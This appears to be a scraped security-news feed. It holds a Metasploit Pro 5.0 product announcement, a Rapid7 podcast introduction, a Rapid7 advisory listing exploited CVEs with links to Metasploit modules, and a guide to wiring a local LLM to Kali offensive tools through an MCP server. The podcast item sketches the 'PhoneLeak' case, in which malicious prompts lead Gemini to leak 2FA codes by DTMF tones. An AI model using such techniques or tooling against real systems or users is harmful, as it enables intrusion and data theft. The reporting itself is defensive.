boost your team's collaboration with the new session tagging feature. Sessions can now be tagged to facilitate advanced and coordinated post-exploitation workflows. Team members can apply instant, custom tags to track status and flag arbitrary qualities, which significantly improves coordination and organization across multi-person engagements.</span></p><h3><span>AD CS exploitation</span></h3><p><span>Tackle one of the most critical attack vectors in modern networks: Metasploit continues its relentless investment in modern exploitation techniques with the groundbreaking updates to the AD CS Workflows Metamodule. This powerful new feature is a significant advancement, providing security professionals with an automated, comprehensive approach to identifying and leveraging nine common AD CS vulnerabilities. </span></p><p><span>Now we’ve taken it even further, with new support for the latest and most dangerous ESC flaws: ESC9, ESC10, and ESC16. Take back control of your Active Directory environment and neutralize these threats with surgical precision. For detailed configuration instructions and comprehensive feature documentation, visit our </span><a href="https://docs.rapid7.com/metasploit/ad-cs-workflows-metamodule/" target="_blank"><span>AD CS Workflows MetaModule documentation</span></a><span>.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte16d0dba44c36619/69b1f82950b0701a323c5763/image5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image5.png" asset-alt="image5.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte16d0dba44c36619/69b1f82950b0701a323c5763/image5.png" data-sys-asset-uid="blte16d0dba44c36619" data-sys-asset-filename="image5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image5.png" sys-style-type="display"></figure><p>⠀</p><h3><span>Session Tags</span></h3><p><span>In fast-moving operations, context can disappear quickly as new sessions come online and analysts shift between tasks. Session tagging brings clarity back to your workflow by letting you attach meaningful labels to every open session. Instead of relying on IPs or hostnames alone, you can tag sessions with identifiers that matter to your team - such as priority, environment, or role - making it easy to group related systems and instantly recognize high-value targets.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7d90d5bf859fd024/69b2b59843279d768e1b1bd5/Metasploit-pro-5-session-tagging.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Metasploit-pro-5-session-tagging.png" asset-alt="Metasploit-pro-5-session-tagging.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7d90d5bf859fd024/69b2b59843279d768e1b1bd5/Metasploit-pro-5-session-tagging.png" data-sys-asset-uid="blt7d90d5bf859fd024" data-sys-asset-filename="Metasploit-pro-5-session-tagging.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Metasploit-pro-5-session-tagging.png" sys-style-type="display"></figure><p>⠀</p><h3><span>SAML Single Sign On</span></h3><p><span>Metasploit Pro now incorporates SAML Single Sign-On (SSO) authentication, providing your team with a simple, unified login experience. By connecting to your centralized directory, users can access Metasploit Pro with the same credentials they use for all other major applications. Administrators can easily configure their identity provider (IDP) to enable a passwordless workflow and utilize existing Multi-Factor Authentication (MFA) services, making access quick, consistent, and part of your standard corporate flow.</span></p><p><span>These features are available in Metasploit Pro 5.0.0 onwards. We’re also proud to collaborate with our customers, who are often the source of inspiration for product evolution. Ideas for improvements or enhancements can be shared with our Support team to help you refine the idea, then submit it to our Product team on your behalf.</span></p><h2><span>Related viewing</span></h2><p><span>Rapid7 Labs launched a podcast today! Episode 1 of 'Hacktics &amp; Telemetry' is now live on </span><a href="https://www.rapid7.com/blog/post/www.youtube.com/@OfficialRapid7" target="_blank"><span>Rapid7's YouTube page.</span></a><span> Alongside some expert commentary on emergent threats and an exciting guest spot, the final segment is all about Metasploit Pro 5.0.0. Dive into our </span><a href="https://www.rapid7.com/blog/post/pt-announcing-metasploit-pro-5-penetration-testing-evolving" target="_blank"><span>official companion blog here,</span></a> and find the full episode embedded below.</p><p>⠀</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Introducing Hacktics and Telemetry, a Podcast from Rapid7 Labs]]></title>
<description><![CDATA[If you spend your days building, shipping, defending, or fixing systems, you already know how this goes. A new technique shows up in a research thread, someone drops a “has anyone checked if we’re exposed?” comment, and suddenly you’re juggling risk, patches, logging gaps, and whatever tool is in...]]></description>
<link>https://tsecurity.de/de/3343890/it-security-nachrichten/introducing-hacktics-and-telemetry-a-podcast-from-rapid7-labs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3343890/it-security-nachrichten/introducing-hacktics-and-telemetry-a-podcast-from-rapid7-labs/</guid>
<pubDate>Thu, 12 Mar 2026 14:21:15 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>If you spend your days building, shipping, defending, or fixing systems, you already know how this goes. A new technique shows up in a research thread, someone drops a</span><span><em> “has anyone checked if we’re exposed?”</em></span><span> comment, and suddenly you’re juggling risk, patches, logging gaps, and whatever tool is in the blast radius this week.</span></p><p><span>That day-to-day reality is why Rapid7 Labs is launching </span><a href="https://youtu.be/lIQ-Wy6q4bI" target="_blank"><span>Hacktics and Telemetry</span></a><span>, a bi-weekly video and audio podcast with episodes built to fit into a lunch break or a commute. </span>It’s hosted by Rapid7's <a href="https://www.linkedin.com/in/douglas-mckee-77460677/" target="_blank">Douglas McKee</a>, bringing to the pod years of deep technical and leadership experience, then co-hosted by <a href="https://www.linkedin.com/in/cryptocat/" target="_blank">Jonah ‘CryptoCat’ Burgess</a> – a strong researcher with a solid pulse on the cybersecurity community.</p><p><span>The format stays consistent on purpose. Each episode starts with a scan of what’s emerging, shifts into a guest conversation, then closes with a short segment that ties the story back to mitigation and tooling. The goal is simple: move past theory, show what’s happening with real examples, and leave you with something you can act on.</span></p><h2><span>Episode 1: OpenClaw Risks, RCEs, and Metasploit Pro Updates</span></h2><p><span>Doug and Jonah open by digging into two AI-centric stories from the past week. The first is PhoneLeak, described as data exfiltration in Gemini via phone call. It’s the kind of uncomfortable example that forces practical questions: how do you defend against mobile clickjacking when it's disguised as a routine CAPTCHA? When an AI assistant has deep extensions into a user's workspace, how do you prevent malicious prompts from quietly accessing sensitive data like 2FA codes? And perhaps most importantly, how do defenders anticipate and monitor for bizarre, out-of-the-box exfiltration methods—like an AI bypassing SMS confirmations to leak data via DTMF tones on a phone call?</span></p><p><span>The second story comes from the other side of the AI conversation: an AI agent reportedly identifying an RCE in BeyondTrust remote support, plus discussion of older privileged remote access versions. More automation can mean faster discovery, which shrinks the window between “interesting finding” and “you need to patch this.” That changes how defenders think about exposure, patch prioritization, and what “good enough” means (and looks like) when it comes to monitoring.</span></p><p><span>In the guest segment, </span><a href="https://www.linkedin.com/in/gregorypkrichardson/" target="_blank"><span>Greg Richardson</span></a><span> (Global Advisory CISO &amp; AI Thought Leader, 6 Levers AI) walks through how he uses AI agents in his workflow while keeping control tight. He talks about setting tasks while he sleeps, but the constraints are the point: access is locked down, the agent only touches files he explicitly provides, communication is limited, and token limits help cap the size of any mistake. He also makes a strong case for starting small, with one task at a time, instead of trying to automate dozens of things on day one.</span></p><p><span>To close out this inaugural episode, the team hits on a SolarWinds Help Desk vulnerability, then shares a quick look at </span><a href="https://www.rapid7.com/blog/post/pt-announcing-metasploit-pro-5-penetration-testing-evolving/" target="_blank"><span>Metasploit Pro 5.0 updates</span></a><span> – including more granular payload selection and a walkthrough of the new UI.</span></p><p><span>If your idea of useful content includes threat trade-offs, concrete mitigations, and a bit of candid “how this actually plays out,” you’re in the right place.</span></p><p><span>Catch the full episode below:</span></p><p>⠀</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 Detection Coverage for Iran-Linked Cyber Activity]]></title>
<description><![CDATA[The tension arising out of the conflict in Iran is beginning to show signs of expanding beyond a strictly regional crisis. Following our recent published advisories, this communication is intended to outline and summarize the detection and enrichment coverage available to Rapid7 customers, broadl...]]></description>
<link>https://tsecurity.de/de/3342089/it-security-nachrichten/rapid7-detection-coverage-for-iran-linked-cyber-activity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3342089/it-security-nachrichten/rapid7-detection-coverage-for-iran-linked-cyber-activity/</guid>
<pubDate>Wed, 11 Mar 2026 18:57:57 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The tension arising out of the conflict in Iran is beginning to show signs of expanding beyond a strictly regional crisis. Following our recent published advisories, this communication is intended to outline and summarize the detection and enrichment coverage available to Rapid7 customers, broadly assess the macro cyber threat landscape, and demonstrate the specific actions undertaken within the Rapid7 portfolio to assure our customers of the protection they receive and can expect moving forward. For a research-driven companion piece from Rapid7 Labs, dive into</span><span><strong> </strong></span><a href="http://www.rapid7.com/blog/post/it-iran-cyber-playbook-escalating-regional-conflict" target="_blank"><span><strong><em>Iran’s Cyber Playbook in the Escalating Regional Conflict</em></strong></span></a><span><strong>.</strong></span></p><h2><span>Tracking the campaigns associated with the current conflict </span></h2><p><span>There exists a number of threat campaigns (both directly and indirectly) associated with groups associated with Iranian APT actors. In order to track details of these campaigns, any relevant indicators of compromise will be made available within </span><a href="https://www.rapid7.com/platform/threat-intelligence-tip" target="_blank"><span>Intelligence Hub</span></a><span>.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7126a55c736bf850/69b182db13aa3d5be1e37d45/collective-campaign-_Intelligence-Hub.png" alt="collective-campaign-_Intelligence-Hub.png" caption="Figure 1: A screenshot of the collective campaign available within Intelligence Hub." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="collective-campaign-_Intelligence-Hub.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7126a55c736bf850/69b182db13aa3d5be1e37d45/collective-campaign-_Intelligence-Hub.png" data-sys-asset-uid="blt7126a55c736bf850" data-sys-asset-filename="collective-campaign-_Intelligence-Hub.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: A screenshot of the collective campaign available within Intelligence Hub." data-sys-asset-alt="collective-campaign-_Intelligence-Hub.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: A screenshot of the collective campaign available within Intelligence Hub.</figcaption></div></figure><p>⠀</p><p><span>As additional intelligence is identified and verified this campaign (and any others) will be incorporated and made available both within the detection stack across the Rapid7 portfolio, but equally for enrichment purposes within Intelligence Hub.</span></p><h2><span>Hacktivist activity and Digital Risk Protection (DRP) coverage </span></h2><p><span>Since the regional military escalations began in late February 2026, Rapid7 Labs has tracked a significant and ongoing spike in retaliatory cyber activity targeting regional and Western infrastructure. What we're seeing falls into two broad buckets. The first is state-directed operations, primarily espionage and data exfiltration, carried out by actors like:</span></p><ul><li><p><span>MuddyWater/Seedworm (MOIS)</span></p></li><li><p><span>CyberAv3ngers (IRGC)</span></p></li><li><p><span>The Handala persona (assessed as being maintained by Void Manticore under MOIS direction). </span></p></li></ul><p><span>The second is a much noisier layer of hacktivist activity, stemming from groups that lack sophistication but generate outsized visibility through DDoS campaigns and public breach claims. These groups include:</span></p><ul><li><p><span>Keymous+</span></p></li><li><p><span>DieNet</span></p></li><li><p><span>NoName057(16).</span></p></li></ul><p><span>A major theme across this escalation is fabrication. Many of the breach claims circulating on Telegram and dark web forums are exaggerated or outright fake. Threat actors, especially on the hacktivist side, are recycling old leaked datasets, overstating their access, and running what amount to psychological operations aimed at causing panic and reputational damage. That said, where state-directed actors are involved, legitimate data theft is a real concern, and there is a strong likelihood that stolen material will be weaponized publicly and quickly.</span></p><p><span>Rapid7's </span><a href="https://www.google.com/url?q=https://www.rapid7.com/products/threat-command/&amp;sa=D&amp;source=docs&amp;ust=1773254132749921&amp;usg=AOvVaw1VeqrK2QHucyzknM0BDVpO" target="_blank"><span>Digital Risk Protection platform</span></a><span> is purpose-built to cover exactly these kinds of threats. Here is how our coverage maps to the current activity:</span></p><ul><li><p><span><strong>Dark web and forum monitoring</strong></span><span> — The coordination and announcements driving these campaigns are happening across Telegram, X (formerly Twitter), and dark web leak sites. DRP continuously monitors clear, deep, and dark web sources, with proprietary crawlers, inspecting tens of millions of pages. This gives us visibility into restricted forums and early warning when campaigns begin targeting specific organizations or sectors.</span></p></li><li><p><span><strong>Data leakage detection and claim verification</strong></span><span> — With so many unsubstantiated breach claims in circulation, the ability to quickly distinguish real exposures from fabricated ones is critical. DRP monitors threat actor dumps and leak sites for exposed company assets and correlates what it finds against each customer's digital footprint, giving organizations a clear answer on whether a claimed breach actually affects them.</span></p></li><li><p><span><strong>Brand security and phishing defense</strong></span><span> — Threat actors are exploiting public confusion to register lookalike domains, clone websites, and create impersonation profiles on social media. DRP identifies these phishing and impersonation threats and supports the takedown of the attacker's infrastructure.</span></p></li><li><p><span><strong>Analyst-verified intelligence</strong></span><span> — Our threat intelligence analysts investigate and triage what surfaces through the platform to ensure customers receive only intelligence that has been verified and is actionable. When a real compromise or data exposure is confirmed, our team works directly with the affected organization to assess the impact and support remediation.</span></p></li></ul><h2><span>CVE intelligence </span></h2><p><span>To fuel the data leak and psychological operations discussed above, state-directed actors like MuddyWater and Void Manticore are actively weaponizing recently disclosed, high-impact vulnerabilities. Rather than focusing on a single product, these APTs are broadly targeting a combination of internet-facing edge devices, enterprise management infrastructure, and client productivity software to gain their initial foothold.</span></p><p><span>The vulnerabilities being leveraged in these campaigns all provide either authentication bypass or remote code execution, giving attackers a direct path into the environment. Once inside, the goal is the same every time: establish persistence and get data out. As noted above, any legitimate data stolen during these intrusions is highly likely to be handed off to hacktivist personas and weaponized publicly to support the broader disinformation campaigns.</span></p><p><span>The following CVEs have been identified as actively exploited or assessed as high-priority targets in the current threat environment:</span></p><ul><li><p><span><strong>CVE-2026-1281</strong></span></p></li><ul><li><p><span><strong>Description:</strong></span><span> A critical command injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM) that grants unauthenticated attackers root-level remote code execution. This has been leveraged as a zero-day vulnerability to compromise mobile endpoint management environments.</span><br><span><strong>Tied to:</strong></span><span> MuddyWater (MOIS)</span></p></li><li><p><span><strong>Metasploit Module:</strong></span><a href="https://www.google.com/search?q=https://github.com/rapid7/metasploit-framework/pull/20932" target="_blank"><span> https://github.com/rapid7/metasploit-framework/pull/20932</span></a></p></li></ul><li><p><span><strong>CVE-2024-4577</strong></span></p></li><ul><li><p><span><strong>Description:</strong></span><span> A critical OS command injection vulnerability in PHP running in CGI mode on Windows. By exploiting Windows "Best-Fit" encoding behaviors, attackers can bypass escape mechanisms and execute arbitrary code on the host server.</span><br><span><strong>Tied to:</strong></span><span> Void Manticore (the MOIS-affiliated actor that maintains the Handala hacktivist persona)</span></p></li><li><p><span><strong>Metasploit Module:</strong></span><a href="https://github.com/rapid7/metasploit-framework/pull/19247" target="_blank"><span> https://github.com/rapid7/metasploit-framework/pull/19247</span></a></p></li></ul><li><p><span><strong>CVE-2025-32433</strong></span></p></li><ul><li><p><span><strong>Description:</strong></span><span> A pre-authentication remote command execution (RCE) flaw in Erlang-based SSH servers. Threat actors can execute arbitrary root commands by sending specially crafted SSH packets, bypassing authentication entirely.</span></p></li><li><p><span><strong>Metasploit Module:</strong></span><span> </span><a href="https://www.rapid7.com/db/modules/exploit/linux/ssh/ssh_erlangotp_rce/" target="_blank"><span>https://www.rapid7.com/db/modules/exploit/linux/ssh/ssh_erlangotp_rce/</span></a><span> </span></p></li></ul><li><p><span><strong>CVE-2025-52691</strong></span></p></li><ul><li><p><span><strong>Description:</strong></span><span> An unauthenticated file upload flaw in SmarterTools SmarterMail. Attackers exploit a path traversal weakness via the </span><span><span data-type="inlineCode">guid</span></span><span> variable to drop malicious files, such as webshells or malicious cron jobs.</span></p></li><li><p><span><strong>Metasploit Module:</strong></span><a href="https://www.google.com/search?q=https://github.com/rapid7/metasploit-framework/pull/20866" target="_blank"><span> https://github.com/rapid7/metasploit-framework/pull/20866</span></a></p></li></ul><li><p><span><strong>CVE-2025-9316</strong></span></p></li><ul><li><p><span><strong>Description:</strong></span><span> An unauthenticated session bypass vulnerability impacting N-able N-Central. Attackers frequently chain this with an XML External Entity (XXE) vulnerability to read highly sensitive local configuration and backup files from the host infrastructure.</span></p></li><li><p><span><strong>Metasploit Module:</strong></span><span> </span><a href="https://github.com/rapid7/metasploit-framework/pull/20713" target="_blank"><span>https://github.com/rapid7/metasploit-framework/pull/20713</span></a><span> </span></p></li></ul><li><p><span><strong>CVE-2026-21514</strong></span></p></li><ul><li><p><span><strong>Description:</strong></span><span> A security feature bypass vulnerability in Microsoft Word that allows an unauthorized attacker to bypass Object Linking &amp; Embedding (OLE) mitigations locally. Exploitation requires user interaction to open a maliciously crafted document.</span></p></li><li><p><span><strong>Rapid7 Coverage:</strong></span><span> Analyzed extensively in Rapid7's</span><a href="https://www.rapid7.com/blog/post/em-patch-tuesday-february-2026/" target="_blank"><span> Patch Tuesday - February 2026</span></a><span> blog post and prioritized for customer patching due to active exploitation</span></p></li></ul></ul><h2><span>Detection and Response for Rapid7 customers </span></h2><p><span>Rapid7’s Threat Hunting team has been actively hunting for activity related to Iranian actors since the regional conflict began. We are utilizing threat intelligence related to new indicators of compromise and known tactics, techniques, and procedures to conduct these hunts. If we have validated findings, the MDR SOC will investigate and communicate the details of findings using the standard notification processes.</span></p><p><span><em>Additional reading from Rapid7 Labs: </em></span><a href="https://www.rapid7.com/blog/post/www.rapid7.com/blog/post/it-iran-cyber-playbook-escalating-regional-conflict" target="_blank"><span><strong><em>Iran’s Cyber Playbook in the Escalating Regional Conflict</em></strong></span></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali & LLM: Completely local with Ollama & 5ire]]></title>
<description><![CDATA[We are extending our LLM-driven Kali series, where natural language replaces manual command input. This time however, we are doing everything locally and offline. We are using our own hardware and not relying on any 3rd party services/SaaS. 
Note: Local LLMs are hardware-hungry. The cost factor h...]]></description>
<link>https://tsecurity.de/de/3337834/tools/kali-llm-completely-local-with-ollama-5ire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3337834/tools/kali-llm-completely-local-with-ollama-5ire/</guid>
<pubDate>Tue, 10 Mar 2026 10:36:07 +0100</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We are extending our LLM-driven Kali series, where natural language replaces manual command input. This time however, we are doing <strong>everything locally and offline</strong>. We are using our own hardware and not relying on any 3rd party services/SaaS. </p>
<p><em>Note: Local LLMs are hardware-hungry. The cost factor here is buying hardware and the running costs. If you have anything that you can re-use, great! </em></p>
<h2>GPU (Nvidia)</h2>
<p>Let’s first find out what our hardware is:</p>
<pre><code class="language-console">$ lspci | grep -i vga
07:00.0 VGA compatible controller: NVIDIA Corporation GP106 [GeForce GTX 1060 6GB] (rev a1)
$
</code></pre>
<p><em>NVIDIA GeForce GTX 1060 (6 GB).</em></p>
<h3>Drivers</h3>
<p>We will check that our hardware is ready by making sure “non-free” proprietary drivers are installed. The non-free option allows for CUDA support which the open-source, <code>nouveau</code>, drivers lack.
At the same time, make sure our Kernel and headers are at the latest version too:</p>
<pre><code class="language-console">$ sudo apt update
[...]
$
$ sudo apt install -y linux-image-$(dpkg --print-architecture) linux-headers-$(dpkg --print-architecture) nvidia-driver nvidia-smi
[...]
│ Conflicting nouveau kernel module loaded │
│ The free nouveau kernel module is currently loaded and conflicts with the non-free nvidia kernel module. │
│ The easiest way to fix this is to reboot the machine once the installation has finished. |
[...]
$
$ sudo reboot
</code></pre>
<div class="notices info">
<p data-header="Info">
Using a different GPU manufacture, such as AMD or Intel etc, is out of scope for this guide.
</p>
</div>
<h3>Testing</h3>
<p>Once the box is back up and we are logged in again, we can do a quick check with <code>nvidia-smi</code>:</p>
<pre><code class="language-console">$ lspci -s 07:00.0 -v | grep Kernel
Kernel driver in use: nvidia
Kernel modules: nvidia
$
$ lsmod | grep '^nouveau'
$
$ lsmod | grep '^nvidia'
nvidia_drm 126976 2
nvidia_modeset 1605632 3 nvidia_drm
nvidia 60710912 29 nvidia_drm,nvidia_modeset
$
$ nvidia-smi
Tue Jan 27 14:33:31 2026
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.163.01 Driver Version: 550.163.01 CUDA Version: 12.4 |
|-----------------------------------------+------------------------+----------------------+
| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|=========================================+========================+======================|
| 0 NVIDIA GeForce GTX 1060 6GB Off | 00000000:07:00.0 On | N/A |
| 0% 30C P8 6W / 120W | 25MiB / 6144MiB | 0% Default |
| | | N/A |
+-----------------------------------------+------------------------+----------------------+
+-----------------------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=========================================================================================|
| 0 N/A N/A 969 G /usr/lib/xorg/Xorg 21MiB |
+-----------------------------------------------------------------------------------------+
$
</code></pre>
<p>Everything looks to be in order.</p>
<h2>Ollama</h2>
<p>Next up, we need to install <a href="https://ollama.com/download/linux">Ollama</a>. Ollama will allow us to load our local LLM.
<em>Ollama is a wrapper for <code>llama.cpp</code>. 5ire supports Ollama, but not llama.cpp.</em></p>
<p>If you do not want to-do <code>curl|bash</code>, see the <a href="https://docs.ollama.com/linux">manual method</a>, or follow below for <code>v0.15.2</code> <em>(latest at the time of writing, 2026-01-27)</em>:</p>
<pre><code class="language-console">$ sudo apt install -y curl
[...]
$
$ curl --fail --location https://ollama.com/download/ollama-linux-amd64.tar.zst &gt; /tmp/ollama-linux-amd64.tar.zst
[...]
$
$ file /tmp/ollama-linux-amd64.tar.zst
/tmp/ollama-linux-amd64.tar.zst: Zstandard compressed data (v0.8+), Dictionary ID: None
$ sha512sum /tmp/ollama-linux-amd64.tar.zst
1c16259de4898a694ac23e7d4a3038dc3aebbbb8247cf30a05f5c84f2bde573294e8e612f3a9d5042201ebfe148f5b7fe64acc50f5478d3453f62f85d44593a1 /tmp/ollama-linux-amd64.tar.zst
$
$ sudo tar x -v --zstd -C /usr -f /tmp/ollama-linux-amd64.tar.zst
[...]
$
$ sudo useradd -r -s /bin/false -U -m -d /usr/share/ollama ollama
$
$ sudo usermod -a -G ollama $(whoami)
$
$ cat &lt;&lt;EOF | sudo tee /etc/systemd/system/ollama.service &gt;/dev/null
[Unit]
Description=Ollama Service
After=network-online.target
[Service]
ExecStart=/usr/bin/ollama serve
User=ollama
Group=ollama
Restart=always
RestartSec=3
Environment="PATH=\$PATH"
[Install]
WantedBy=multi-user.target
EOF
$
$ sudo systemctl daemon-reload
$
$ sudo systemctl enable --now ollama
Created symlink '/etc/systemd/system/multi-user.target.wants/ollama.service' → '/etc/systemd/system/ollama.service'.
$
$ systemctl status ollama
● ollama.service - Ollama Service
Loaded: loaded (/etc/systemd/system/ollama.service; enabled; preset: disabled)
Active: active (running) since Tue 2026-01-27 14:44:39 GMT; 18s ago
[...]
$
$ ollama -v
ollama version is 0.15.2
$
</code></pre>
<p>The service is reporting to be active and running (and nothing is off in the logs files).</p>
<h3>LLM</h3>
<p>Now we need an LLM for Ollama to run! There are a few places to find pre-generated LLMs:</p>
<ul>
<li><a href="https://ollama.com/search?c=tools">Ollama.com</a></li>
<li><a href="https://huggingface.co/models?apps=ollama">HuggingFace.co</a> <em>(aka HF)</em></li>
</ul>
<p>Which models you might ask? <em>Time to experiment!</em></p>
<ul>
<li>We need a model which has “Tools” support. <em>We will explain later why this is important.</em></li>
<li>Your hardware will dictate how complex of a model you can run. <em>The hardware we are using has 6GB of VRAM , so we will need a model size which requires less.</em></li>
</ul>
<p>We have chosen 3 to test:</p>
<ul>
<li><a href="https://ollama.com/library/llama3.1">llama3.1</a> - <code>ollama pull llama3.1:8b</code></li>
<li><a href="https://ollama.com/library/llama3.2">llama3.2</a> - <code>ollama pull llama3.2:3b</code></li>
<li><a href="https://ollama.com/library/qwen3">qwen3</a> - <code>ollama pull qwen3:4b</code></li>
</ul>
<pre><code class="language-console">$ ollama list
NAME ID SIZE MODIFIED
llama3.1:8b 46e0c10c039e 4.9 GB 8 minutes ago
llama3.2:3b a80c4f17acd5 2.0 GB 29 minutes ago
qwen3:4b 359d7dd4bcda 2.5 GB 39 minutes ago
$
</code></pre>
<h3>Testing</h3>
<p>Let’s test that Ollama is working.</p>
<pre><code class="language-console">$ ollama run qwen3:4b
</code></pre>
<p>The first time we do this, it needs to load the model into memory. This may take a while depending on your hardware.</p>
<p>When the LLM has been loaded, we will get a prompt. Let’s just say “Hello world!”:</p>
<pre><code>&gt;&gt;&gt; Hello world!
Thinking...
Okay, the user said "Hello world!" and wants me to respond. Let me think about how to approach this. First, I should acknowledge their greeting. Since they used the classic "Hello World!" which is often
the first program in many programming languages, maybe I can relate that to my capabilities. I should make sure to keep the tone friendly and open for further conversation. Let me check if there's
anything specific they might need help with. Maybe they're just testing me or want to start a discussion. I'll keep the response simple and welcoming, inviting them to ask questions or share what they
need help with. Also, I should avoid any markdown and keep it natural. Alright, time to put that together.
...done thinking.
Hello! 😊 How can I assist you today? Whether you have questions, need help with something, or just want to chat, I'm here for you! What's on your mind?
&gt;&gt;&gt; /exit
$
</code></pre>
<p>We can check Ollama status by doing:</p>
<pre><code class="language-console">$ ollama ps
NAME ID SIZE PROCESSOR CONTEXT UNTIL
qwen3:4b 359d7dd4bcda 3.5 GB 100% GPU 4096 4 minutes from now
$
</code></pre>
<p>Great, it appears that everything is working well here.</p>
<h2>MCP Server (MCP Kali Server)</h2>
<p>We will now need to install and run a MCP server.</p>
<p>For this guide, we did a fresh <a href="https://www.kali.org/docs/troubleshooting/common-minimum-setup/">minimal installation</a> of Kali, which means there isn’t any pre-installed tools.</p>
<p>Sticking once again to <a href="https://www.kali.org/tools/mcp-kali-server/">mcp-kali-server</a>:</p>
<pre><code class="language-console">$ sudo apt install -y mcp-kali-server dirb gobuster nikto nmap enum4linux-ng hydra john metasploit-framework sqlmap wpscan wordlists
[...]
$
$ sudo gunzip -v /usr/share/wordlists/rockyou.txt.gz
/usr/share/wordlists/rockyou.txt.gz: 61.9% -- replaced with /usr/share/wordlists/rockyou.txt
$
$ kali-server-mcp
2026-01-27 15:54:01,339 [INFO] Starting Kali Linux Tools API Server on 127.0.0.1:5000
* Serving Flask app 'kali_server'
* Debug mode: off
2026-01-27 15:54:01,352 [INFO] WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on http://127.0.0.1:5000
2026-01-27 15:54:01,352 [INFO] Press CTRL+C to quit
</code></pre>
<div class="notices info">
<p data-header="Info">
<em>Long term, there are various different ways to have <code>kali-server-mcp</code> running in the background, such as using a tmux/screen session, or creating a systemd.unit, but that’s out of scope for this.</em>
</p>
</div>
<h3>Testing</h3>
<p>Let’s manually run <code>mcp-server</code> now:</p>
<pre><code class="language-console">$ mcp-server
2026-01-27 15:54:18,802 [INFO] Initialized Kali Tools Client connecting to http://localhost:5000
2026-01-27 15:54:18,811 [INFO] Successfully connected to Kali API server at http://localhost:5000
2026-01-27 15:54:18,811 [INFO] Server health status: healthy
2026-01-27 15:54:18,826 [INFO] Starting Kali MCP server
2026-01-27 15:54:18,804 [INFO] Executing command: which nmap
2026-01-27 15:54:18,806 [INFO] Executing command: which gobuster
2026-01-27 15:54:18,807 [INFO] Executing command: which dirb
2026-01-27 15:54:18,808 [INFO] Executing command: which nikto
2026-01-27 15:54:18,810 [INFO] 127.0.0.1 - - [27/Jan/2026 15:54:18] "GET /health HTTP/1.1" 200 -
</code></pre>
<p>Everything is looking good! No errors or warnings.</p>
<p>We can also see that <code>kali-server-mcp</code> has additional lines in its log. Good.</p>
<h2>5ire</h2>
<p>So we have a local LLM working, and a MCP.
Ollama doesn’t support MCP (yet?), so we need to use something that can take bridge the gap.
Enter 5ire - “A Sleek AI Assistant &amp; MCP Client”.</p>
<p>Next, Download <a href="https://github.com/nanbingxyz/5ire/releases/latest">5ire’s AppImage</a> <em>(<code>5ire-0.15.3-x86_64.AppImage</code> at the time of writing, 2026-01-27)</em> and make a menu entry:</p>
<pre><code class="language-console">$ curl --fail --location https://github.com/nanbingxyz/5ire/releases/download/v0.15.3/5ire-0.15.3-x86_64.AppImage &gt; 5ire-x86_64.AppImage
[...]
$
$ file 5ire-x86_64.AppImage
5ire-x86_64.AppImage: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, stripped
$ sha512sum 5ire-x86_64.AppImage
bdf665fc6636da240153d44629723cb311bba4068db21c607f05cc6e1e58bb2e45aa72363a979a2aa165cb08a12db7babb715ac58da448fc9cf0258b22a56707 5ire-x86_64.AppImage
$
$ sudo mkdir -pv /opt/5ire/
mkdir: created directory '/opt/5ire/'
$
$ sudo mv -v 5ire-x86_64.AppImage /opt/5ire/5ire-x86_64.AppImage
renamed '5ire-x86_64.AppImage' -&gt; '/opt/5ire/5ire-x86_64.AppImage'
$
$ chmod -v 0755 /opt/5ire/5ire-x86_64.AppImage
mode of '/opt/5ire/5ire-x86_64.AppImage' changed from 0664 (rw-rw-r--) to 0755 (rwxr-xr-x)
$
$ mkdir -pv ~/.local/share/applications/
mkdir: created directory '/home/kali/.local/share/applications/'
$
$ cat &lt;&lt;EOF | sudo tee ~/.local/share/applications/5ire.desktop &gt;/dev/null
[Desktop Entry]
Name=5ire
Comment=5ire Desktop AI Assistant
Exec=/opt/5ire/5ire-x86_64.AppImage
Terminal=false
Type=Application
Categories=Utility;Development;
StartupWMClass=5ire
EOF
$
$ sudo ln -sfv /opt/5ire/5ire-x86_64.AppImage /usr/local/bin/5ire
'/usr/local/bin/5ire' -&gt; '/opt/5ire/5ire-x86_64.AppImage'
$
$ sudo apt install -y libfuse2t64
[...]
$
</code></pre>
<p>We can now either use the menu, or call it from a terminal.</p>
<hr>
<p>Now we need to configure 5ire to use Ollama (for LLM) and <code>mcp-kali-server</code> (MCP server):</p>
